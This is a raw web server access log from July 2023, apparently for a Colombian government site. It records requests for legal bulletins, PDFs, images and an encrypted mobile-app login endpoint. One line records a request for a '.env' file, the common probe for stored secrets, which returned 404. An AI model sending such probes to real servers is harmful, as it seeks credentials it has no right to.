66.249.70.197 - - [07/Jul/2023:03:49:37 -0500] "-" 408 -
172.22.2.4 - - [07/Jul/2023:03:49:50 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1018
172.22.2.4 - - [07/Jul/2023:03:48:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
113.207.1.133 - - [07/Jul/2023:03:50:25 -0500] "GET /galeria/galeria/fotos/Humedal-la-conejera4P.jpg HTTP/1.1" 200 33365
172.22.2.4 - - [07/Jul/2023:03:49:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54453
34.140.248.32 - - [07/Jul/2023:03:53:00 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [07/Jul/2023:03:53:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:03:54:04 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.192 - - [07/Jul/2023:03:55:59 -0500] "-" 408 -
172.22.2.4 - - [07/Jul/2023:03:54:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:03:55:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
52.167.144.38 - - [07/Jul/2023:03:57:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/2037.pdf HTTP/1.1" 304 -
18.192.126.221 - - [07/Jul/2023:03:57:50 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [07/Jul/2023:03:58:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:03:58:40 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-746-12.docx HTTP/1.1" 304 -
216.245.221.92 - - [07/Jul/2023:03:59:04 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.196 - - [07/Jul/2023:03:59:59 -0500] "-" 408 -
172.22.2.4 - - [07/Jul/2023:04:00:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
69.63.184.3 - - [07/Jul/2023:04:02:22 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_id=Julio_2023 HTTP/1.1" 200 783
69.63.184.1 - - [07/Jul/2023:04:02:23 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_id=Julio_2023 HTTP/1.1" 200 783
172.22.2.4 - - [07/Jul/2023:04:01:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
104.152.52.98 - - [07/Jul/2023:04:03:21 -0500] "GET / HTTP/1.0" 200 319
201.245.192.253 - - [07/Jul/2023:04:03:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.102.76.125 - - [07/Jul/2023:04:03:37 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/wQ7tObv3G2DmZIkdrkKrUUJhMWL6N+1a7wZl7wAJLW8NVOe/d1sty&y=U2FsdGVkX198J6W65mocLjDbJp6EKPNRpRAKFl1JCfk= HTTP/1.1" 200 30
186.102.76.125 - - [07/Jul/2023:04:03:38 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/+OS5w5pp2ES3+i4+f8eOPlVTaS5H1vxMmr+GGBHeaRAHEwdEnoNK4KIPJn+qYrBKBiMwWTklZJlEeGxHFREJUCvKfHbjciFI=&u=U2FsdGVkX1+c3Tv/GutAkB0nt7TVpx0gdr8DNHILIaQ=&y=U2FsdGVkX198J6W65mocLjDbJp6EKPNRpRAKFl1JCfk= HTTP/1.1" 200 97
186.102.76.125 - - [07/Jul/2023:04:03:38 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18/or84qg0j1H8c6fywuWe+Snk/yBUjywPr6CfdGNgHVWZ8ocZF79TNV/YhirSd4FAExoZQZiC4mxw2NRBbRlz/tuTUNFkCSZy9HyINeUQQAKWpfS5fdVodmqyLmFTPR7At+6u+GBT/aEs5cqxuUBY9ImWMg2FaHcsNuXSpcnFqyoa1/rFOVjw92sAc20D0IgULNT3OmvP0qz/Q+cRNDRvYq57U+Y8aj0Gm60EbYLEz45Cp426DScPqFkQWXWCMse7POgrd/rVW8GHcwmXrcMUN7Cup0Yhz2ApQSL3ka6BgSLxrHs7GMpuhyPFnqrAeOHfD6duAjkRPftN1D8C/Kf64MlYaAHKcnvQdqSKeZJGJKnE3ZncJl7dE8NoFYJdJ2DJ0UpdmJVwl60UQ6AjCEuaj59TqXJ5dgKukAcT3nm8EsTMsU6iVlZUwXj9sXq2yNHGKlbVpmn/5mnVUYnlzWpN8AOS3ioo5yScmaBmx6xPZG0U700otVYvXNPHzT6F0b9WVZE0BepiRE4fBlfp6V0SgI2DlrDqkL2QbiuPEpc5Zz88u4cAgPb/4qfDeeYbc4q3qjAkO3Co5mSIoR0HZ3oABmDn5KnOvfajDJoFe1CLd7bZwynTZYccPo2xxltgLsPMdFfIF5VQCsGMPpT+EHQ4qY5rBXlnTbS++os6o46/BxXrOJuJiNJj/8Z86w/hilaXsCHWyv++m1V/7gkVa8lu06b5EztUdZR+11cT+M+YjXvzCzR88kHsf0+055bCbKzcIMwVG+9N7KUvRKSeDymrsExfe6NdNPwKX3gNLiyy3trfqO+LeayzacUpOgUUQE3LJrS+W/PhEY9AmyIVXv6NCUNRwWyUiTNvyUF43oIku7HnmZN9y1OhOo7mw7H3odJ5AX4DYNAUxRdwuF9igja6nE3rAPWvI4xBnrxoAdmhCGP7QzajCHKEk8NqDu0qi/7e2/6hCQbI8dlK38bzY+ImhdHKVwRTTxkhmmlWO1ICSiGELoY6UmX6Wer5TincMbJBaq8mrGjMbUB3FKmqGXZerT/yzvXgfeIq5TjVzJq/Zvia8lOaYQGeMLBfcAxdODWE8j/x7a/j8+IGFHt1qdDf25E4R9q0BbCeSGI7GDKXVqg2RUI9LFK5BZUJECKGUohhfF7KYzdYDW22OOwBD9huXTIYW0mbto0d3xQCsVoEmCjoV3bRl0+dXwAsvghSYUHWwO3N64t1h/+TEDw8jzG0tAdVTWPmbhT1rF3Wfyf8HRt3qeC7ijoG5gv5UUrMprdlt7e+mwGypgnL/rYE3Zo50SIukkP2ueGNpUnB/qFy4PL7whVLIzJa7BoAsN+kD9Uq1M8rTHd8yShvspUjmoLYRcqXZXPnzgRL9e+mAdYHFTxq2cDYpgGFSGAw/tFaUIQHyjw5m7gPprgfCjSmUP+W7NGGKL0nVKC8=&u=U2FsdGVkX1+c3Tv/GutAkB0nt7TVpx0gdr8DNHILIaQ=&y=U2FsdGVkX198J6W65mocLjDbJp6EKPNRpRAKFl1JCfk= HTTP/1.1" 200 371
186.102.76.125 - - [07/Jul/2023:04:03:38 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/sPAisyce7Z9MbC/X1k8CzlGbXdgfFPbzBOAaFMSvLajwvCPI7oJb0pNStCx2g0MxSYVtYCFc2OEmH0cUR0PwVX6bwz83JxZpnDwqulO5jze/M7NrKBIuv0llvbHy2BNPa4AdLD5f0QNtE70khQ60X/wGliOw2hkDFFxYQO4gF9Sv4D//1xZrsIlw6G3kmg+lGbiNIEG7+yRX9I+w2VEAcu1vql+pNlRZcKf9fWh0s/79bT7Kmd3Xmz4uzQsIUXA0FrBuQ0PcKlwrkWPy/9/A8OHvsELN9O3LfDK6SrvQrw4mnc3ELVPdKCuLY9hNQ+zn8bORZjiWt/g==&u=U2FsdGVkX1+c3Tv/GutAkB0nt7TVpx0gdr8DNHILIaQ=&y=U2FsdGVkX198J6W65mocLjDbJp6EKPNRpRAKFl1JCfk= HTTP/1.1" 200 196
